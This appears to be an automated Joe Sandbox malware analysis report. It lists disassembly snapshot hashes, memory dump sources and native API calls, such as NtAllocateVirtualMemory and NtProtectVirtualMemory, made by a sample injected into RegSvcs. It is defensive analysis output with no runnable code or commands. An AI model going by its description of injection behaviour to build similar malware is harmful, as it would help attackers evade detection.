                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6b7fd1cdd0165fe50045c7a56723024a7a77e7604251ad1cf36f28e6ae94e73c
                                          • Instruction ID: f476be679b443257348b7e3477acc1392b9d06315c5b3fcb6332e564d871e878
                                          • Opcode Fuzzy Hash: 6b7fd1cdd0165fe50045c7a56723024a7a77e7604251ad1cf36f28e6ae94e73c
                                          • Instruction Fuzzy Hash: 0311E771E09AAE8FEB52D7349C692A97BB0FF85300F5001FAC049DB292CE356941CB10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9c7320f20dd8590155a4a19e341919b1621abbe34d5a0f944bfd2592dd53f71b
                                          • Instruction ID: 4c761d0bb0b056ffa8fd23c1ec4f6feeded92471002a1a115db9b3d226c0422f
                                          • Opcode Fuzzy Hash: 9c7320f20dd8590155a4a19e341919b1621abbe34d5a0f944bfd2592dd53f71b
                                          • Instruction Fuzzy Hash: EE11B670E19A2D8FDBA5EB5888A56E8B7B1EF58301F1041EAD00DE7265DB34A9818F10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3ab2405cdd0f1208f6e3ee3c084e5439ed89714c667263cc41a33754147dfc8a
                                          • Instruction ID: 1dd905c9075d017b3cdeb43e5b1c458b630ad8dc9d95c8c11cebafdcea744808
                                          • Opcode Fuzzy Hash: 3ab2405cdd0f1208f6e3ee3c084e5439ed89714c667263cc41a33754147dfc8a
                                          • Instruction Fuzzy Hash: F811CE34E4A61E8BEB64DF64E490AEE73B1FB88310F000679E919A7291DF747A44CB11
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1b4ef05cdf272dfff5afd2221481118ad8c507e45f7be4d3f6570b2d4ba438ad
                                          • Instruction ID: 1d5bc07134de23517171c342d81a5df72ecafedd6ae6be1095ea12e0f0961a7f
                                          • Opcode Fuzzy Hash: 1b4ef05cdf272dfff5afd2221481118ad8c507e45f7be4d3f6570b2d4ba438ad
                                          • Instruction Fuzzy Hash: 91115E71E0491E8FDF44CF98D4909AEB7B1FF98310F10422AD419E7250CB34A9068B80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: aafadef0ecfcd6a702c31cde43f3e95b7b9fb2e92d1a931ff2eb0679d035db4e
                                          • Instruction ID: 7adf56d5278c0bbaf886d1e5d7459e325e9f4dc043cd43e2856b1defa457eb0e
                                          • Opcode Fuzzy Hash: aafadef0ecfcd6a702c31cde43f3e95b7b9fb2e92d1a931ff2eb0679d035db4e
                                          • Instruction Fuzzy Hash: 2101AD71A0991D8BDF88EA58D8242FAB7A1FB88310F0406BAE009F3295CF65681487A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cf9ae74cab8bd0bfc42bca42857a4585219ac1c879daf6ed2384fed8c7376917
                                          • Instruction ID: 478db8f3524e3b767f4cc15ccb1b5b2a100e392a7836d506e1e5a6efae868e9e
                                          • Opcode Fuzzy Hash: cf9ae74cab8bd0bfc42bca42857a4585219ac1c879daf6ed2384fed8c7376917
                                          • Instruction Fuzzy Hash: E7018B70809B4DCFDB84EF2888592EE7BF0FF28301F4106AAE818C3261DB75A550CB81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 61221ba2e8fe6b097b1a84bc75ab4d8c16e20a6873f67e0bcffce852e465b448
                                          • Instruction ID: d1bce37adb685dfb3f9342adb627bc59dce6ed95c3176a1b18e1f976934b5ed9
                                          • Opcode Fuzzy Hash: 61221ba2e8fe6b097b1a84bc75ab4d8c16e20a6873f67e0bcffce852e465b448
                                          • Instruction Fuzzy Hash: B7011A30915A1D8FCB9CEF94C8A19FDB3B1FF95301F10456EA01A9B695CB35A842CF40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e08feaee8cf9bee88286544fb315cc750e98fc87445e3ddea9ab0ad20c8576ba
                                          • Instruction ID: aaa1c324c11d4347339a4d9500aef9924f6593781ba2668167672a635457887d
                                          • Opcode Fuzzy Hash: e08feaee8cf9bee88286544fb315cc750e98fc87445e3ddea9ab0ad20c8576ba
                                          • Instruction Fuzzy Hash: E801A530A0A51D8FDF44EF98C8949ADB7F2FB98300F114569D41AEB2A5DB39A900CB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3c7c09e1e3d4bf31fd6875dbc98327366ee25f9edf9fb5de3f4fcb7d1e71132c
                                          • Instruction ID: ff71c2da9b5221fded1b4501437122bb83f585764787881ae2c5ad8499a0e8cb
                                          • Opcode Fuzzy Hash: 3c7c09e1e3d4bf31fd6875dbc98327366ee25f9edf9fb5de3f4fcb7d1e71132c
                                          • Instruction Fuzzy Hash: 0CF08671D0A96E8EE7A4D72C98A57F877F0EF55200F0085F6D41DE71A2DE352E848B14
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4b6335a87e174d56c1799df073318b3ada50852520e70697cef9c7cc13aa8b4c
                                          • Instruction ID: ee2e5daa9e7168a429b20121ebec46d36ab6031eb0345743e530925aa784bda8
                                          • Opcode Fuzzy Hash: 4b6335a87e174d56c1799df073318b3ada50852520e70697cef9c7cc13aa8b4c
                                          • Instruction Fuzzy Hash: 74F0F930914A5DCFDB80EF6898496EE77F0FF58305F400A6AE819D3260DB75A654CB81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 35304572327ef348c0450aaa3b09f8b9755a630820ad36be1d2ba858f58114e4
                                          • Instruction ID: e4d8f73938c03fb25c44d6b4a88acb37d4fe097cab54208e6e8e0abb27db6a9f
                                          • Opcode Fuzzy Hash: 35304572327ef348c0450aaa3b09f8b9755a630820ad36be1d2ba858f58114e4
                                          • Instruction Fuzzy Hash: C801FB74E05609CFDB48DF68C5959EDB7F2FB89310F20853AC41AAB2A5CA35A901CF54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 597966ed8244f273e2ccbd45ac5efc84bf2d8283310a38cab77bccb932b17707
                                          • Instruction ID: f4148636159d1f0cbcc3ed6113e2182d0fb7757cf52368abf97d47c57fc5dbd2
                                          • Opcode Fuzzy Hash: 597966ed8244f273e2ccbd45ac5efc84bf2d8283310a38cab77bccb932b17707
                                          • Instruction Fuzzy Hash: AAF01730928A5E8FDB80EF68D8496EE77F0FF58304F000A66E81CD3260DB74A654CB81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 52140f364b1d2cf207bbc05b4c763e011baf83340096a1229533ecb5a83348e5
                                          • Instruction ID: bc679f258ca609bbf779a69f5514916de03043fe4202dca0e1af65e437bb9853
                                          • Opcode Fuzzy Hash: 52140f364b1d2cf207bbc05b4c763e011baf83340096a1229533ecb5a83348e5
                                          • Instruction Fuzzy Hash: E7F05E30955A4DCFDB44EF28D8856EA77A0FF88304F40057AF819C7290DB35B551CB81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: efc8947d1ed121d01ba3d39f65b365de900048eaa171adb7ed8c9ed156504ff7
                                          • Instruction ID: 117ac817501831f98a8d415379a1775cebffb890a16f84910cf082f683fb55fc
                                          • Opcode Fuzzy Hash: efc8947d1ed121d01ba3d39f65b365de900048eaa171adb7ed8c9ed156504ff7
                                          • Instruction Fuzzy Hash: 17F01F74D5AA2D9EEBE5EB188895BECB6B1FB58300F5004E6D40CE7261DF35A9808F10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 729d3792202dcc5bfa461cc45c1e0efc6595076a2ef356e52a07ee9e94295425
                                          • Instruction ID: 936c49aa705d8c9c1d5927c4cf9e7f8bb92569d393757a47d3557b9ce4ee80f1
                                          • Opcode Fuzzy Hash: 729d3792202dcc5bfa461cc45c1e0efc6595076a2ef356e52a07ee9e94295425
                                          • Instruction Fuzzy Hash: D4F0543490955E8FCB48EF04C4949A9B321FF61300B5047A5D0199F169C730E451CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b81196af0450fadfa7d118cc8b1ee5e354a196138ac962570b512fef0542a253
                                          • Instruction ID: 8aef17337c6b8cbd487b8a08b56c8d6c8862326120e1de940c2b6c3d4a0b5c04
                                          • Opcode Fuzzy Hash: b81196af0450fadfa7d118cc8b1ee5e354a196138ac962570b512fef0542a253
                                          • Instruction Fuzzy Hash: D6D02B9290AADF4AE948E32804751F456A1EF96210F4406B6888DDA1C3ED082C908923
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: db1bbf6054ae1ce8cfc8c7d4417888c64867fbb091d6333063fb8f56c62270a0
                                          • Instruction ID: bcaedc6a5d1071a5003142e4aa353df2ebde36638e6dbb15bb16926a630c90ed
                                          • Opcode Fuzzy Hash: db1bbf6054ae1ce8cfc8c7d4417888c64867fbb091d6333063fb8f56c62270a0
                                          • Instruction Fuzzy Hash: 25E04FB0D0692D9EEBE8CA1CD495AE8B770FB89701F1042AAC05EA6251DF349881CF00
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e2b76e3ac42b69cfda405ce8b6a068eb3d7449333547696b3b628e168ef613cc
                                          • Instruction ID: 63dd474508e1100ac24950123aa1c8e2e55e28ab1d8258af9d42e82ae5da3c0f
                                          • Opcode Fuzzy Hash: e2b76e3ac42b69cfda405ce8b6a068eb3d7449333547696b3b628e168ef613cc
                                          • Instruction Fuzzy Hash: 22D09592D0B9EB45ED54E32414F40F44391DFD1201F000A75C90DDD2D3DE0C7C408522
                                          Uniqueness

                                          Uniqueness Score: -1.00%


                                          Execution Graph

                                          Execution Coverage:4.4%
                                          Dynamic/Decrypted Code Coverage:2.2%
                                          Signature Coverage:4.2%
                                          Total number of Nodes:667
                                          Total number of Limit Nodes:84

                                          Control-flow Graph

                                          APIs
                                          • NtProtectVirtualMemory.NTDLL(000000FF,00000000,?,00000040,?), ref: 0040153C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MemoryProtectVirtual
                                          • String ID: 8Gx2$s}]
                                          • API String ID: 2706961497-945437964
                                          • Opcode ID: 5bb49a8eef3be3edd932109a5e3adeb38c6f9bfda43da5c4f592a477622c970e
                                          • Instruction ID: c0b0455e42076189d83d4af9986f3c51775b971acdbe136d0495b293f72d024c
                                          • Opcode Fuzzy Hash: 5bb49a8eef3be3edd932109a5e3adeb38c6f9bfda43da5c4f592a477622c970e
                                          • Instruction Fuzzy Hash: 28814671C2075C9ADF10CFE4CC41AEEBBB4BF99304F20426EE504BA251EBB416898B95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 28 41e083-41e0c4 call 41eb17 NtAllocateVirtualMemory
                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,HD@,00002000,00003000,00000004), ref: 0041E0C0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID: HD@
                                          • API String ID: 2167126740-1661062907
                                          • Opcode ID: 5963d8c5123dac3d58657db6fefd9ffd8b71426ea0f2c56084ddf82e0e0f09d0
                                          • Instruction ID: f444772827566111b6b78d4de23a24a9c190825f352371e7213e3277b505b669
                                          • Opcode Fuzzy Hash: 5963d8c5123dac3d58657db6fefd9ffd8b71426ea0f2c56084ddf82e0e0f09d0
                                          • Instruction Fuzzy Hash: 1CF08CB5200158AFCB14CFA9DC81EEB3BADAF8D354F008148FE4997242C630E810CBB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 31 41e087-41e09d 32 41e0a3-41e0c4 NtAllocateVirtualMemory 31->32 33 41e09e call 41eb17 31->33 33->32
                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,HD@,00002000,00003000,00000004), ref: 0041E0C0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID: HD@
                                          • API String ID: 2167126740-1661062907
                                          • Opcode ID: ff407167e8468b06ad404ccbb9f5efcd270d3cf321b6c6ce0313f5831c1888d1
                                          • Instruction ID: f463faf2946c0d4d74eccb42d7aa3306e3984d4a8e1b0def0a1c2f8da30aeccc
                                          • Opcode Fuzzy Hash: ff407167e8468b06ad404ccbb9f5efcd270d3cf321b6c6ce0313f5831c1888d1
                                          • Instruction Fuzzy Hash: B0F015B6200218ABCB18DF89DC81EEB77ADAF88754F018109BE0997241C630F810CBB4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 267 4014e9 268 4014f0-4014ff 267->268 269 401501-401504 268->269 270 401512-401519 268->270 269->270 271 401506-40150a 269->271 270->268 272 40151b 270->272 271->270 273 40150c-401510 271->273 274 40151e-401573 NtProtectVirtualMemory call 4016b0 272->274 273->270 275 401586-40158c 273->275 279 401579 call 422e47 274->279 280 401579 call 422e3c 274->280 275->274 278 40157b-401585 279->278 280->278
                                          APIs
                                          • NtProtectVirtualMemory.NTDLL(000000FF,00000000,?,00000040,?), ref: 0040153C
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MemoryProtectVirtual
                                          • String ID:
                                          • API String ID: 2706961497-0
                                          • Opcode ID: 2ccf1af8b1afc4039ea8271a65d5ec8a78ac774a0c6154e0d45900dd57b3cca3
                                          • Instruction ID: 34c4158c7035c3201076cb6992f7939b7151f1a69bee33a53c60aa8d7b13dc8b
                                          • Opcode Fuzzy Hash: 2ccf1af8b1afc4039ea8271a65d5ec8a78ac774a0c6154e0d45900dd57b3cca3
                                          • Instruction Fuzzy Hash: 5111A374C141085EEF25CEB0DD45ADFB778EB40324F20026EEA61A61A2E3B4190D8F81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 306 41dea1-41def8 call 41eb17 NtCreateFile
                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00000005,00000000,004187F3,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,004187F3,00000000,00000005,00000060,00000000,00000000), ref: 0041DEF4
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: a078c3bf9d57d83358e91183a1e3254be38147f7c3a1d2eec9006c3564a7671c
                                          • Instruction ID: 76886fd1fa7346b0aab19e964d9b1aa73b83f4006ed5145762f29fd3670f22a2
                                          • Opcode Fuzzy Hash: a078c3bf9d57d83358e91183a1e3254be38147f7c3a1d2eec9006c3564a7671c
                                          • Instruction Fuzzy Hash: 2F01B6B2600108AFCB58CF99DC85EEB37A9EF8C754F118219BE0DD7241D630E851CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 309 41dea7-41debd 310 41dec3-41def8 NtCreateFile 309->310 311 41debe call 41eb17 309->311 311->310
                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00000005,00000000,004187F3,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,004187F3,00000000,00000005,00000060,00000000,00000000), ref: 0041DEF4
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: e85e77ba2c54ed5fbcc428c4a95e80045b35a7a87df5efc95b4940160543289c
                                          • Instruction ID: caa4313a033a612cc3db5c025c9ef0f97435adee46135c765efab3485d53b6e5
                                          • Opcode Fuzzy Hash: e85e77ba2c54ed5fbcc428c4a95e80045b35a7a87df5efc95b4940160543289c
                                          • Instruction Fuzzy Hash: 64F0BDB2204208ABCB08CF89DC85EEB37ADAF8C754F018208BA0997241D630F851CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 312 41df57-41dfa0 call 41eb17 NtReadFile
                                          APIs
                                          • NtReadFile.NTDLL(004189B7,00413C93,FFFFFFFF,004184A1,00000206,?,004189B7,00000206,004184A1,FFFFFFFF,00413C93,004189B7,00000206,00000000), ref: 0041DF9C
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: 46e9d61f60eefd5b9ec08f7c79a1628f979f043a503e788909cff7321939f862
                                          • Instruction ID: 655cb4e4c396fce941b8546bf9d16efbca437de042abb1fe47c2fd903f90b2bb
                                          • Opcode Fuzzy Hash: 46e9d61f60eefd5b9ec08f7c79a1628f979f043a503e788909cff7321939f862
                                          • Instruction Fuzzy Hash: 76F0AFB6200208ABCB14DF89DC85EEB77ADAF8C754F118249BE0DA7241D630E811CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtClose.NTDLL(00418995,00000206,?,00418995,00000005,FFFFFFFF), ref: 0041DFFC
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: 6f36c58043209be16d439a3199aaaee235847fb3c9824624ee7abedc41f38536
                                          • Instruction ID: d7652ac376bfee5cbf167f0e09bc99e97af7e0678d6cdc255ef65e079968a69b
                                          • Opcode Fuzzy Hash: 6f36c58043209be16d439a3199aaaee235847fb3c9824624ee7abedc41f38536
                                          • Instruction Fuzzy Hash: 78D01776204214ABD614EBA9DC89ED77BACDF48664F014155BA0D5B242D631FA008BE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtClose.NTDLL(00418995,00000206,?,00418995,00000005,FFFFFFFF), ref: 0041DFFC
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: 777f6a8e1023c543128c3ec3fc07f0c36be24b25318d8d8fb6fb8c16991747f5
                                          • Instruction ID: 3d21b19ef568e9596e24c7ef5757160b60eef1f82d4920551701afcaed2e002f
                                          • Opcode Fuzzy Hash: 777f6a8e1023c543128c3ec3fc07f0c36be24b25318d8d8fb6fb8c16991747f5
                                          • Instruction Fuzzy Hash: 19E0C2BA40D3C04FC721EB78A4C00C6BF54DF9212872555CFD8955B603D261A216DB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 7027aed29c9cdf1ccd5d6732b5ebedaf9c71400d93d62a2a6af0887b7c40878f
                                          • Instruction ID: 34151ade5806bbf71e8b8819996a3cdbfc9045146a9652c26ad180fc56fd6287
                                          • Opcode Fuzzy Hash: 7027aed29c9cdf1ccd5d6732b5ebedaf9c71400d93d62a2a6af0887b7c40878f
                                          • Instruction Fuzzy Hash: 1F9002B530100403D540719944047460045A7E0345F51C021A5054594EC6999DD976A9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 5d7b36044ea3c25c761be3773f2b37129e41ad55fcf2f4cd833d6689ca544ed6
                                          • Instruction ID: 0e956ea85d43c82f80a5588f995596dd662b6d04af8f44d0fe4197390cd454e8
                                          • Opcode Fuzzy Hash: 5d7b36044ea3c25c761be3773f2b37129e41ad55fcf2f4cd833d6689ca544ed6
                                          • Instruction Fuzzy Hash: 279002A534100443D50061994414B060045E7F1345F51C025E1054594DC659DC56716A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
